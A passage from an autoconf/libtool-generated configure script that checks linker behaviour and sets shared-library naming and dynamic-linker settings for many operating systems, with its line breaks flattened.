"$GCC,$enable_shared"; then case $archive_cmds in *'~'*) # FIXME: we may have to deal with multi-command sequences. ;; '$CC '*) # Test whether the compiler implicitly links with -lc since on some # systems, -lgcc has to come before -lc. If gcc already passes -lc # to ld, don't add -lc before -lgcc. { $as_echo "$as_me:${as_lineno-$LINENO}: checking whether -lc should be explicitly linked in" >&5 $as_echo_n "checking whether -lc should be explicitly linked in... " >&6; } if ${lt_cv_archive_cmds_need_lc+:} false; then : $as_echo_n "(cached) " >&6 else $RM conftest* echo "$lt_simple_compile_test_code" > conftest.$ac_ext if { { eval echo "\"\$as_me\":${as_lineno-$LINENO}: \"$ac_compile\""; } >&5 (eval $ac_compile) 2>&5 ac_status=$? $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; } 2>conftest.err; then soname=conftest lib=conftest libobjs=conftest.$ac_objext deplibs= wl=$lt_prog_compiler_wl pic_flag=$lt_prog_compiler_pic compiler_flags=-v linker_flags=-v verstring= output_objdir=. libname=conftest lt_save_allow_undefined_flag=$allow_undefined_flag allow_undefined_flag= if { { eval echo "\"\$as_me\":${as_lineno-$LINENO}: \"$archive_cmds 2\>\&1 \| $GREP \" -lc \" \>/dev/null 2\>\&1\""; } >&5 (eval $archive_cmds 2\>\&1 \| $GREP \" -lc \" \>/dev/null 2\>\&1) 2>&5 ac_status=$? $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; } then lt_cv_archive_cmds_need_lc=no else lt_cv_archive_cmds_need_lc=yes fi allow_undefined_flag=$lt_save_allow_undefined_flag else cat conftest.err 1>&5 fi $RM conftest* fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $lt_cv_archive_cmds_need_lc" >&5 $as_echo "$lt_cv_archive_cmds_need_lc" >&6; } archive_cmds_need_lc=$lt_cv_archive_cmds_need_lc ;; esac fi ;; esac { $as_echo "$as_me:${as_lineno-$LINENO}: checking dynamic linker characteristics" >&5 $as_echo_n "checking dynamic linker characteristics... " >&6; } if test yes = "$GCC"; then case $host_os in darwin*) lt_awk_arg='/^libraries:/,/LR/' ;; *) lt_awk_arg='/^libraries:/' ;; esac case $host_os in mingw* | cegcc*) lt_sed_strip_eq='s|=\([A-Za-z]:\)|\1|g' ;; *) lt_sed_strip_eq='s|=/|/|g' ;; esac lt_search_path_spec=`$CC -print-search-dirs | awk $lt_awk_arg | $SED -e "s/^libraries://" -e $lt_sed_strip_eq` case $lt_search_path_spec in *\;*) # if the path contains ";" then we assume it to be the separator # otherwise default to the standard path separator (i.e. ":") - it is # assumed that no part of a normal pathname contains ";" but that should # okay in the real world where ";" in dirpaths is itself problematic. lt_search_path_spec=`$ECHO "$lt_search_path_spec" | $SED 's/;/ /g'` ;; *) lt_search_path_spec=`$ECHO "$lt_search_path_spec" | $SED "s/$PATH_SEPARATOR/ /g"` ;; esac # Ok, now we have the path, separated by spaces, we can step through it # and add multilib dir if necessary... lt_tmp_lt_search_path_spec= lt_multi_os_dir=/`$CC $CPPFLAGS $CFLAGS $LDFLAGS -print-multi-os-directory 2>/dev/null` # ...but if some path component already ends with the multilib dir we assume # that all is fine and trust -print-search-dirs as is (GCC 4.2? or newer). case "$lt_multi_os_dir; $lt_search_path_spec " in "/; "* | "/.; "* | "/./; "* | *"$lt_multi_os_dir "* | *"$lt_multi_os_dir/ "*) lt_multi_os_dir= ;; esac for lt_sys_path in $lt_search_path_spec; do if test -d "$lt_sys_path$lt_multi_os_dir"; then lt_tmp_lt_search_path_spec="$lt_tmp_lt_search_path_spec $lt_sys_path$lt_multi_os_dir" elif test -n "$lt_multi_os_dir"; then test -d "$lt_sys_path" && \ lt_tmp_lt_search_path_spec="$lt_tmp_lt_search_path_spec $lt_sys_path" fi done lt_search_path_spec=`$ECHO "$lt_tmp_lt_search_path_spec" | awk ' BEGIN {RS = " "; FS = "/|\n";} { lt_foo = ""; lt_count = 0; for (lt_i = NF; lt_i > 0; lt_i--) { if ($lt_i != "" && $lt_i != ".") { if ($lt_i == "..") { lt_count++; } else { if (lt_count == 0) { lt_foo = "/" $lt_i lt_foo; } else { lt_count--; } } } } if (lt_foo != "") { lt_freq[lt_foo]++; } if (lt_freq[lt_foo] == 1) { print lt_foo; } }'` # AWK program above erroneously prepends '/' to C:/dos/paths # for these hosts. case $host_os in mingw* | cegcc*) lt_search_path_spec=`$ECHO "$lt_search_path_spec" |\ $SED 's|/\([A-Za-z]:\)|\1|g'` ;; esac sys_lib_search_path_spec=`$ECHO "$lt_search_path_spec" | $lt_NL2SP` else sys_lib_search_path_spec="/lib /usr/lib /usr/local/lib" fi library_names_spec= libname_spec='lib$name' soname_spec= shrext_cmds=.so postinstall_cmds= postuninstall_cmds= finish_cmds= finish_eval= shlibpath_var= shlibpath_overrides_runpath=unknown version_type=none dynamic_linker="$host_os ld.so" sys_lib_dlsearch_path_spec="/lib /usr/lib" need_lib_prefix=unknown hardcode_into_libs=no # when you set need_version to no, make sure it does not cause -set_version # flags to be left without arguments need_version=unknown case $host_os in aix3*) version_type=linux # correct to gnu/linux during the next big refactor library_names_spec='$libname$release$shared_ext$versuffix $libname.a' shlibpath_var=LIBPATH # AIX 3 has no versioning support, so we append a major version to the name. soname_spec='$libname$release$shared_ext$major' ;; aix[4-9]*) version_type=linux # correct to gnu/linux during the next big refactor need_lib_prefix=no need_version=no hardcode_into_libs=yes if test ia64 = "$host_cpu"; then # AIX 5 supports IA64 library_names_spec='$libname$release$shared_ext$major $libname$release$shared_ext$versuffix $libname$shared_ext' shlibpath_var=LD_LIBRARY_PATH else # With GCC up to 2.95.x, collect2 would create an import file # for dependence libraries. The import file would start with # the line '#! .'. This would cause the generated library to # depend on '.', always an invalid library. This was fixed in # development snapshots of GCC prior to 3.0. case $host_os in aix4 | aix4.[01] | aix4.[01].*) if { echo '#if __GNUC__ > 2 || (__GNUC__ == 2 && __GNUC_MINOR__ >= 97)' echo ' yes ' echo '#endif'; } | $CC -E - | $GREP yes > /dev/null; then : else can_build_shared=no fi ;; esac # Using Import Files as archive members, it is possible to support # filename-based versioning of shared library archives on AIX. While # this would work for both with and without runtime linking, it will # prevent static linking of such archives. So we do filename-based # shared library versioning with .so extension only, which is used # when both runtime linking and shared linking is enabled. # Unfortunately, runtime linking may impact performance, so we do # not want this to be the default eventually. Also, we use the # versioned .so libs for executables only if there is the -brtl # linker flag in LDFLAGS as well, or --with-aix-soname=svr4 only. # To allow for filename-based versioning support, we need to create # libNAME.so.V as an archive file, containing: # *) an Import File, referring to the versioned filename of the # archive as well as the shared archive member, telling the # bitwidth (32 or 64) of that shared object, and providing the # list of exported symbols of that shared object, eventually # decorated with the 'weak' keyword # *) the shared object with the F_LOADONLY flag set, to really avoid # it being seen by the linker. # At run time we better use the real file rather than another symlink, # but for link time we create the symlink libNAME.so -> libNAME.so.V case $with_aix_soname,$aix_use_runtimelinking in # AIX (on Power*) has no versioning support, so currently we cannot hardcode correct # soname into executable. Probably we can add versioning support to # collect2, so additional links can be useful in future. aix,yes) # traditional libtool dynamic_linker='AIX unversionable lib.so' # If using run time linking (on AIX 4.2 or later) use lib.so # instead of lib.a to let people know that these are not # typical AIX shared libraries. library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$shared_ext' ;; aix,no) # traditional AIX only dynamic_linker='AIX lib.a(lib.so.V)' # We preserve .a as extension for shared libraries through AIX4.2 # and later when we are not doing run time linking. library_names_spec='$libname$release.a $libname.a' soname_spec='$libname$release$shared_ext$major' ;; svr4,*) # full svr4 only dynamic_linker="AIX lib.so.V($shared_archive_member_spec.o)" library_names_spec='$libname$release$shared_ext$major $libname$shared_ext' # We do not specify a path in Import Files, so LIBPATH fires. shlibpath_overrides_runpath=yes ;; *,yes) # both, prefer svr4 dynamic_linker="AIX lib.so.V($shared_archive_member_spec.o), lib.a(lib.so.V)" library_names_spec='$libname$release$shared_ext$major $libname$shared_ext' # unpreferred sharedlib libNAME.a needs extra handling postinstall_cmds='test -n "$linkname" || linkname="$realname"~func_stripname "" ".so" "$linkname"~$install_shared_prog "$dir/$func_stripname_result.$libext" "$destdir/$func_stripname_result.$libext"~test -z "$tstripme" || test -z "$striplib" || $striplib "$destdir/$func_stripname_result.$libext"' postuninstall_cmds='for n in $library_names $old_library; do :; done~func_stripname "" ".so" "$n"~test "$func_stripname_result" = "$n" || func_append rmfiles " $odir/$func_stripname_result.$libext"' # We do not specify a path in Import Files, so LIBPATH fires. shlibpath_overrides_runpath=yes ;; *,no) # both, prefer aix dynamic_linker="AIX lib.a(lib.so.V), lib.so.V($shared_archive_member_spec.o)" library_names_spec='$libname$release.a $libname.a' soname_spec='$libname$release$shared_ext$major' # unpreferred sharedlib libNAME.so.V and symlink libNAME.so need extra handling postinstall_cmds='test -z "$dlname" || $install_shared_prog $dir/$dlname $destdir/$dlname~test -z "$tstripme" || test -z "$striplib" || $striplib $destdir/$dlname~test -n "$linkname" || linkname=$realname~func_stripname "" ".a" "$linkname"~(cd "$destdir" && $LN_S -f $dlname $func_stripname_result.so)' postuninstall_cmds='test -z "$dlname" || func_append rmfiles " $odir/$dlname"~for n in $old_library $library_names; do :; done~func_stripname "" ".a" "$n"~func_append rmfiles " $odir/$func_stripname_result.so"' ;; esac shlibpath_var=LIBPATH fi ;; amigaos*) case $host_cpu in powerpc) # Since July 2007 AmigaOS4 officially supports .so libraries. # When compiling the executable, add -use-dynld -Lsobjs: to the compileline. library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$shared_ext' ;; m68k) library_names_spec='$libname.ixlibrary $libname.a' # Create ${libname}_ixlibrary.a entries in /sys/libs. finish_eval='for lib in `ls $libdir/*.ixlibrary 2>/dev/null`; do libname=`func_echo_all "$lib" | $SED '\''s%^.*/\([^/]*\)\.ixlibrary$%\1%'\''`; $RM /sys/libs/${libname}_ixlibrary.a; $show "cd /sys/libs && $LN_S $lib ${libname}_ixlibrary.a"; cd /sys/libs && $LN_S $lib ${libname}_ixlibrary.a || exit 1; done' ;; esac ;; beos*) library_names_spec='$libname$shared_ext' dynamic_linker="$host_os ld.so" shlibpath_var=LIBRARY_PATH ;; bsdi[45]*) version_type=linux # correct to gnu/linux during the next big refactor need_version=no library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$shared_ext' soname_spec='$libname$release$shared_ext$major' finish_cmds='PATH="\$PATH:/sbin" ldconfig $libdir' shlibpath_var=LD_LIBRARY_PATH sys_lib_search_path_spec="/shlib /usr/lib /usr/X11/lib /usr/contrib/lib /lib /usr/local/lib" sys_lib_dlsearch_path_spec="/shlib /usr/lib /usr/local/lib" # the default ld.so.conf also contains /usr/contrib/lib and # /usr/X11R6/lib (/usr/X11 is a link to /usr/X11R6), but let us allow # libtool to hard-code these into programs ;; cygwin* | mingw* | pw32* | cegcc*) version_type=windows shrext_cmds=.dll need_version=no need_lib_prefix=no case $GCC,$cc_basename in yes,*) # gcc library_names_spec='$libname.dll.a' # DLL is installed to $(libdir)/../bin by postinstall_cmds postinstall_cmds='base_file=`basename \$file`~ dlpath=`$SHELL 2>&1 -c '\''. $dir/'\''\$base_file'\''i; echo \$dlname'\''`~ dldir=$destdir/`dirname \$dlpath`~ test -d \$dldir || mkdir -p \$dldir~ $install_prog $dir/$dlname \$dldir/$dlname~ chmod a+x \$dldir/$dlname~ if test -n '\''$stripme'\'' && test -n '\''$striplib'\''; then eval '\''$striplib \$dldir/$dlname'\'' || exit \$?; fi' postuninstall_cmds='dldll=`$SHELL 2>&1 -c '\''. $file; echo \$dlname'\''`~ dlpath=$dir/\$dldll~ $RM \$dlpath' shlibpath_overrides_runpath=yes case $host_os in cygwin*) # Cygwin DLLs use 'cyg' prefix rather than 'lib' soname_spec='`echo $libname | sed -e 's/^lib/cyg/'``echo $release | $SED -e 's/[.]/-/g'`$versuffix$shared_ext' sys_lib_search_path_spec="$sys_lib_search_path_spec /usr/lib/w32api" ;; mingw* | cegcc*) # MinGW DLLs use traditional 'lib' prefix soname_spec='$libname`echo $release | $SED -e 's/[.]/-/g'`$versuffix$shared_ext' ;; pw32*) # pw32 DLLs use 'pw' prefix rather than 'lib' library_names_spec='`echo $libname | sed -e 's/^lib/pw/'``echo $release | $SED -e 's/[.]/-/g'`$versuffix$shared_ext' ;; esac dynamic_linker='Win32 ld.exe' ;; *,cl* | *,icl*) # Native MSVC or ICC libname_spec='$name' soname_spec='$libname`echo $release | $SED -e 's/[.]/-/g'`$versuffix$shared_ext' library_names_spec='$libname.dll.lib' case $build_os in mingw*) sys_lib_search_path_spec= lt_save_ifs=$IFS IFS=';' for lt_path in $LIB do IFS=$lt_save_ifs # Let DOS variable expansion print the short 8.3 style file name. lt_path=`cd "$lt_path" 2>/dev/null && cmd //C "for %i in (".") do @echo %~si"` sys_lib_search_path_spec="$sys_lib_search_path_spec $lt_path" done IFS=$lt_save_ifs # Convert to MSYS style. sys_lib_search_path_spec=`$ECHO "$sys_lib_search_path_spec" | sed -e 's|\\\\|/|g' -e 's| \\([a-zA-Z]\\):| /\\1|g' -e 's|^ ||'` ;; cygwin*) # Convert to unix form, then to dos form, then back to unix form # but this time dos style (no spaces!) so that the unix form looks # like /cygdrive/c/PROGRA~1:/cygdr... sys_lib_search_path_spec=`cygpath --path --unix "$LIB"` sys_lib_search_path_spec=`cygpath --path --dos "$sys_lib_search_path_spec" 2>/dev/null` sys_lib_search_path_spec=`cygpath --path --unix "$sys_lib_search_path_spec" | $SED -e "s/$PATH_SEPARATOR/ /g"` ;; *) sys_lib_search_path_spec=$LIB if $ECHO "$sys_lib_search_path_spec" | $GREP ';[c-zC-Z]:/' >/dev/null; then # It is most probably a Windows format PATH. sys_lib_search_path_spec=`$ECHO "$sys_lib_search_path_spec" | $SED -e 's/;/ /g'` else sys_lib_search_path_spec=`$ECHO "$sys_lib_search_path_spec" | $SED -e "s/$PATH_SEPARATOR/ /g"` fi # FIXME: find the short name or the path components, as spaces are # common. (e.g. "Program Files" -> "PROGRA~1") ;; esac # DLL is installed to $(libdir)/../bin by postinstall_cmds postinstall_cmds='base_file=`basename \$file`~ dlpath=`$SHELL 2>&1 -c '\''. $dir/'\''\$base_file'\''i; echo \$dlname'\''`~ dldir=$destdir/`dirname \$dlpath`~ test -d \$dldir || mkdir -p \$dldir~ $install_prog $dir/$dlname \$dldir/$dlname' postuninstall_cmds='dldll=`$SHELL 2>&1 -c '\''. $file; echo \$dlname'\''`~ dlpath=$dir/\$dldll~ $RM \$dlpath' shlibpath_overrides_runpath=yes dynamic_linker='Win32 link.exe' ;; *) # Assume MSVC and ICC wrapper library_names_spec='$libname`echo $release | $SED -e 's/[.]/-/g'`$versuffix$shared_ext $libname.lib' dynamic_linker='Win32 ld.exe' ;; esac # FIXME: first we should search . and the directory the executable is in shlibpath_var=PATH ;; darwin* | rhapsody*) dynamic_linker="$host_os dyld" version_type=darwin need_lib_prefix=no need_version=no library_names_spec='$libname$release$major$shared_ext $libname$shared_ext' soname_spec='$libname$release$major$shared_ext' shlibpath_overrides_runpath=yes shlibpath_var=DYLD_LIBRARY_PATH shrext_cmds='`test .$module = .yes && echo .so || echo .dylib`' sys_lib_search_path_spec="$sys_lib_search_path_spec /usr/local/lib" sys_lib_dlsearch_path_spec='/usr/local/lib /lib /usr/lib' ;; dgux*) version_type=linux # correct to gnu/linux during the next big refactor need_lib_prefix=no need_version=no library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$shared_ext' soname_spec='$libname$release$shared_ext$major' shlibpath_var=LD_LIBRARY_PATH ;; freebsd* | dragonfly*) # DragonFly does not have aout. When/if they implement a new # versioning mechanism, adjust this. if test -x /usr/bin/objformat; then objformat=`/usr/bin/objformat` else case $host_os in freebsd[23].*) objformat=aout ;; *) objformat=elf ;; esac fi version_type=freebsd-$objformat case $version_type in freebsd-elf*) library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$shared_ext' soname_spec='$libname$release$shared_ext$major' need_version=no need_lib_prefix=no ;; freebsd-*) library_names_spec='$libname$release$shared_ext$versuffix $libname$shared_ext$versuffix' need_version=yes ;; esac shlibpath_var=LD_LIBRARY_PATH case $host_os in freebsd2.*) shlibpath_overrides_runpath=yes ;; freebsd3.[01]* | freebsdelf3.[01]*) shlibpath_overrides_runpath=yes hardcode_into_libs=yes ;; freebsd3.[2-9]* | freebsdelf3.[2-9]* | \ freebsd4.[0-5] | freebsdelf4.[0-5] | freebsd4.1.1 | freebsdelf4.1.1) shlibpath_overrides_runpath=no hardcode_into_libs=yes ;; *) # from 4.6 on, and DragonFly shlibpath_overrides_runpath=yes hardcode_into_libs=yes ;; esac ;; haiku*) version_type=linux # correct to gnu/linux during the next big refactor need_lib_prefix=no need_version=no dynamic_linker="$host_os runtime_loader" library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$shared_ext' soname_spec='$libname$release$shared_ext$major' shlibpath_var=LIBRARY_PATH shlibpath_overrides_runpath=no sys_lib_dlsearch_path_spec='/boot/home/config/lib /boot/common/lib /boot/system/lib' hardcode_into_libs=yes ;; hpux9* | hpux10* | hpux11*) # Give a soname corresponding to the major version so that dld.sl refuses to # link against other versions. version_type=sunos need_lib_prefix=no need_version=no case $host_cpu in ia64*) shrext_cmds='.so' hardcode_into_libs=yes dynamic_linker="$host_os dld.so" shlibpath_var=LD_LIBRARY_PATH shlibpath_overrides_runpath=yes # Unless +noenvvar is specified. library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$shared_ext' soname_spec='$libname$release$shared_ext$major' if test 32 = "$HPUX_IA64_MODE"; then sys_lib_search_path_spec="/usr/lib/hpux32 /usr/local/lib/hpux32 /usr/local/lib" sys_lib_dlsearch_path_spec=/usr/lib/hpux32 else sys_lib_search_path_spec="/usr/lib/hpux64 /usr/local/lib/hpux64" sys_lib_dlsearch_path_spec=/usr/lib/hpux64 fi ;; hppa*64*) shrext_cmds='.sl' hardcode_into_libs=yes dynamic_linker="$host_os dld.sl" shlibpath_var=LD_LIBRARY_PATH # How should we handle SHLIB_PATH shlibpath_overrides_runpath=yes # Unless +noenvvar is specified. library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$shared_ext' soname_spec='$libname$release$shared_ext$major' sys_lib_search_path_spec="/usr/lib/pa20_64 /usr/ccs/lib/pa20_64" sys_lib_dlsearch_path_spec=$sys_lib_search_path_spec ;; *) shrext_cmds='.sl' dynamic_linker="$host_os dld.sl" shlibpath_var=SHLIB_PATH shlibpath_overrides_runpath=no # +s is required to enable SHLIB_PATH library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$shared_ext' soname_spec='$libname$release$shared_ext$major' ;; esac # HP-UX runs *really* slowly unless shared libraries are mode 555, ... postinstall_cmds='chmod 555 $lib' # or fails outright, so override atomically: install_override_mode=555 ;; interix[3-9]*) version_type=linux # correct to gnu/linux during the next big refactor need_lib_prefix=no need_version=no library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$shared_ext' soname_spec='$libname$release$shared_ext$major' dynamic_linker='Interix 3.x ld.so.1 (PE, like ELF)' shlibpath_var=LD_LIBRARY_PATH shlibpath_overrides_runpath=no hardcode_into_libs=yes ;; irix5* | irix6* | nonstopux*) case $host_os in nonstopux*) version_type=nonstopux ;; *) if test yes = "$lt_cv_prog_gnu_ld"; then version_type=linux # correct to gnu/linux during the next big refactor else version_type=irix fi ;; esac need_lib_prefix=no need_version=no soname_spec='$libname$release$shared_ext$major' library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$release$shared_ext $libname$shared_ext' case $host_os in irix5* | nonstopux*) libsuff= shlibsuff= ;; *) case $LD in # libtool.m4 will add one of these switches to LD *-32|*"-32 "|*-melf32bsmip|*"-melf32bsmip ") libsuff= shlibsuff= libmagic=32-bit;; *-n32|*"-n32 "|*-melf32bmipn32|*"-melf32bmipn32 ") libsuff=32 shlibsuff=N32 libmagic=N32;; *-64|*"-64 "|*-melf64bmip|*"-melf64bmip ") libsuff=64 shlibsuff=64 libmagic=64-bit;; *) libsuff= shlibsuff= libmagic=never-match;; esac ;; esac shlibpath_var=LD_LIBRARY${shlibsuff}_PATH shlibpath_overrides_runpath=no sys_lib_search_path_spec="/usr/lib$libsuff /lib$libsuff /usr/local/lib$libsuff" sys_lib_dlsearch_path_spec="/usr/lib$libsuff /lib$libsuff" hardcode_into_libs=yes ;; # No shared lib support for Linux oldld, aout, or coff. linux*oldld* | linux*aout* | linux*coff*) dynamic_linker=no ;; linux*android*) version_type=none # Android doesn't support versioned libraries. need_lib_prefix=no need_version=no library_names_spec='$libname$release$shared_ext' soname_spec='$libname$release$shared_ext' finish_cmds= shlibpath_var=LD_LIBRARY_PATH shlibpath_overrides_runpath=yes # This implies no fast_install, which is unacceptable. # Some rework will be needed to allow for fast_install # before this can be enabled. hardcode_into_libs=yes dynamic_linker='Android linker' # Don't embed -rpath directories since the linker doesn't support them. hardcode_libdir_flag_spec='-L$libdir' ;; # This must be glibc/ELF. linux* | k*bsd*-gnu | kopensolaris*-gnu | gnu*) version_type=linux # correct to gnu/linux during the next big refactor need_lib_prefix=no need_version=no library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$shared_ext' soname_spec='$libname$release$shared_ext$major' finish_cmds='PATH="\$PATH:/sbin" ldconfig -n $libdir' shlibpath_var=LD_LIBRARY_PATH shlibpath_overrides_runpath=no # Some binutils ld are patched to set DT_RUNPATH if ${lt_cv_shlibpath_overrides_runpath+:} false; then : $as_echo_n "(cached) " >&6 else lt_cv_shlibpath_overrides_runpath=no save_LDFLAGS=$LDFLAGS save_libdir=$libdir eval "libdir=/foo; wl=\"$lt_prog_compiler_wl\"; \ LDFLAGS=\"\$LDFLAGS $hardcode_libdir_flag_spec\"" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int main () { ; return 0; } _ACEOF if ac_fn_c_try_link "$LINENO"; then : if ($OBJDUMP -p conftest$ac_exeext) 2>/dev/null | grep "RUNPATH.*$libdir" >/dev/null; then : lt_cv_shlibpath_overrides_runpath=yes fi fi rm -f core conftest.err conftest.$ac_objext \ conftest$ac_exeext conftest.$ac_ext LDFLAGS=$save_LDFLAGS libdir=$save_libdir fi shlibpath_overrides_runpath=$lt_cv_shlibpath_overrides_runpath # This implies no fast_install, which is unacceptable. # Some rework will be needed to allow for fast_install # before this can be enabled. hardcode_into_libs=yes # Ideally, we could use ldconfig to report *all* directores which are # searched for libraries, however this is still not possible. Aside from not # being certain /sbin/ldconfig is available, command # 'ldconfig -N -X -v | grep ^/' on 64bit Fedora does not report /usr/lib64, # even though it is searched at run-time. Try to do the best guess by # appending ld.so.conf contents (and includes) to the search path. if test -f /etc/ld.so.conf; then lt_ld_extra=`awk '/^include / { system(sprintf("cd /etc; cat %s 2>/dev/null", \$2)); skip = 1; } { if (!skip) print \$0; skip = 0; }' < /etc/ld.so.conf | $SED -e 's/#.*//;/^[ ]*hwcap[ ]/d;s/[:, ]/ /g;s/=[^=]*$//;s/=[^= ]* / /g;s/"//g;/^$/d' | tr '\n' ' '` sys_lib_dlsearch_path_spec="/lib /usr/lib $lt_ld_extra" fi # We used to test for /lib/ld.so.1 and disable shared libraries on # powerpc, because MkLinux only supported shared libraries with the # GNU dynamic linker. Since this was broken with cross compilers, # most powerpc-linux boxes support dynamic linking these days and # people can always --disable-shared, the test was removed, and we # assume the GNU/Linux dynamic linker is in use. dynamic_linker='GNU/Linux ld.so' ;; netbsd*) version_type=sunos need_lib_prefix=no need_version=no if echo __ELF__ | $CC -E - | $GREP __ELF__ >/dev/null; then library_names_spec='$libname$release$shared_ext$versuffix $libname$shared_ext$versuffix' finish_cmds='PATH="\$PATH:/sbin" ldconfig -m $libdir' dynamic_linker='NetBSD (a.out) ld.so' else library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$shared_ext' soname_spec='$libname$release$shared_ext$major' dynamic_linker='NetBSD ld.elf_so' fi shlibpath_var=LD_LIBRARY_PATH shlibpath_overrides_runpath=yes hardcode_into_libs=yes ;; newsos6) version_type=linux # correct to gnu/linux during the next big refactor library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$shared_ext' shlibpath_var=LD_LIBRARY_PATH shlibpath_overrides_runpath=yes ;; *nto* | *qnx*) version_type=qnx need_lib_prefix=no need_version=no library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$shared_ext' soname_spec='$libname$release$shared_ext$major' shlibpath_var=LD_LIBRARY_PATH shlibpath_overrides_runpath=no hardcode_into_libs=yes dynamic_linker='ldqnx.so' ;; openbsd* | bitrig*) version_type=sunos sys_lib_dlsearch_path_spec=/usr/lib need_lib_prefix=no if test -z "`echo __ELF__ | $CC -E - | $GREP __ELF__`"; then need_version=no else need_version=yes fi library_names_spec='$libname$release$shared_ext$versuffix $libname$shared_ext$versuffix' finish_cmds='PATH="\$PATH:/sbin" ldconfig -m $libdir' shlibpath_var=LD_LIBRARY_PATH shlibpath_overrides_runpath=yes ;; os2*) libname_spec='$name' version_type=windows shrext_cmds=.dll need_version=no need_lib_prefix=no # OS/2 can only load a DLL with a base name of 8 characters or less. soname_spec='`test -n "$os2dllname" && libname="$os2dllname"; v=$($ECHO $release$versuffix | tr -d .-); n=$($ECHO $libname | cut -b -$((8 - ${#v})) | tr . _); $ECHO $n$v`$shared_ext' library_names_spec='${libname}_dll.$libext' dynamic_linker='OS/2 ld.exe' shlibpath_var=BEGINLIBPATH sys_lib_search_path_spec="/lib /usr/lib /usr/local/lib" sys_lib_dlsearch_path_spec=$sys_lib_search_path_spec postinstall_cmds='base_file=`basename \$file`~ dlpath=`$SHELL 2>&1 -c '\''. $dir/'\''\$base_file'\''i; $ECHO \$dlname'\''`~ dldir=$destdir/`dirname \$dlpath`~ test -d \$dldir || mkdir -p \$dldir~ $install_prog $dir/$dlname \$dldir/$dlname~ chmod a+x \$dldir/$dlname~ if test -n '\''$stripme'\'' && test -n '\''$striplib'\''; then eval '\''$striplib \$dldir/$dlname'\'' || exit \$?; fi' postuninstall_cmds='dldll=`$SHELL 2>&1 -c '\''. $file; $ECHO \$dlname'\''`~ dlpath=$dir/\$dldll~ $RM \$dlpath' ;; osf3* | osf4* | osf5*) version_type=osf need_lib_prefix=no need_version=no soname_spec='$libname$release$shared_ext$major' library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$shared_ext' shlibpath_var=LD_LIBRARY_PATH sys_lib_search_path_spec="/usr/shlib /usr/ccs/lib /usr/lib/cmplrs/cc /usr/lib /usr/local/lib /var/shlib" sys_lib_dlsearch_path_spec=$sys_lib_search_path_spec ;; rdos*) dynamic_linker=no ;; solaris*) version_type=linux # correct to gnu/linux during the next big refactor need_lib_prefix=no need_version=no library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$shared_ext' soname_spec='$libname$release$shared_ext$major' shlibpath_var=LD_LIBRARY_PATH shlibpath_overrides_runpath=yes hardcode_into_libs=yes # ldd complains unless libraries are executable postinstall_cmds='chmod +x $lib' ;; sunos4*) version_type=sunos library_names_spec='$libname$release$shared_ext$versuffix $libname$shared_ext$versuffix' finish_cmds='PATH="\$PATH:/usr/etc" ldconfig $libdir' shlibpath_var=LD_LIBRARY_PATH shlibpath_overrides_runpath=yes if test yes = "$with_gnu_ld"; then need_lib_prefix=no fi need_version=yes ;; sysv4 | sysv4.3*) version_type=linux # correct to gnu/linux during the next big refactor library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$shared_ext' soname_spec='$libname$release$shared_ext$major' shlibpath_var=LD_LIBRARY_PATH case $host_vendor in sni) shlibpath_overrides_runpath=no need_lib_prefix=no runpath_var=LD_RUN_PATH ;; siemens) need_lib_prefix=no ;; motorola) need_lib_prefix=no need_version=no shlibpath_overrides_runpath=no sys_lib_search_path_spec='/lib /usr/lib /usr/ccs/lib' ;; esac ;; sysv4*MP*) if test -d /usr/nec; then version_type=linux # correct to gnu/linux during the next big refactor library_names_spec='$libname$shared_ext.$versuffix $libname$shared_ext.$major $libname$shared_ext' soname_spec='$libname$shared_ext.$major' shlibpath_var=LD_LIBRARY_PATH fi ;; sysv5* | sco3.2v5* | sco5v6* | unixware* | OpenUNIX* | sysv4*uw2*) version_type=sco need_lib_prefix=no need_version=no library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext $libname$shared_ext' soname_spec='$libname$release$shared_ext$major' shlibpath_var=LD_LIBRARY_PATH shlibpath_overrides_runpath=yes hardcode_into_libs=yes if test yes = "$with_gnu_ld"; then sys_lib_search_path_spec='/usr/local/lib /usr/gnu/lib /usr/ccs/lib /usr/lib /lib' else sys_lib_search_path_spec='/usr/ccs/lib /usr/lib' case $host_os in sco3.2v5*) sys_lib_search_path_spec="$sys_lib_search_path_spec /lib" ;; esac fi sys_lib_dlsearch_path_spec='/usr/lib' ;; tpf*) # TPF is a cross-target only. Preferred cross-host = GNU/Linux. version_type=linux # correct to gnu/linux during the next big refactor need_lib_prefix=no need_version=no library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$shared_ext' shlibpath_var=LD_LIBRARY_PATH shlibpath_overrides_runpath=no hardcode_into_libs=yes ;; uts4*) version_type=linux # correct to gnu/linux during the next big refactor library_names_spec='$libname$release$shared_ext$versuffix $libname$release$shared_ext$major $libname$shared_ext' soname_spec='$libname$release$shared_ext$major' shlibpath_var=LD_LIBRARY_PATH ;; *) dynamic_linker=no ;; esac { $as_echo "$as_me:${as_lineno-$LINENO}: result: $dynamic_linker" >&5 $as_echo 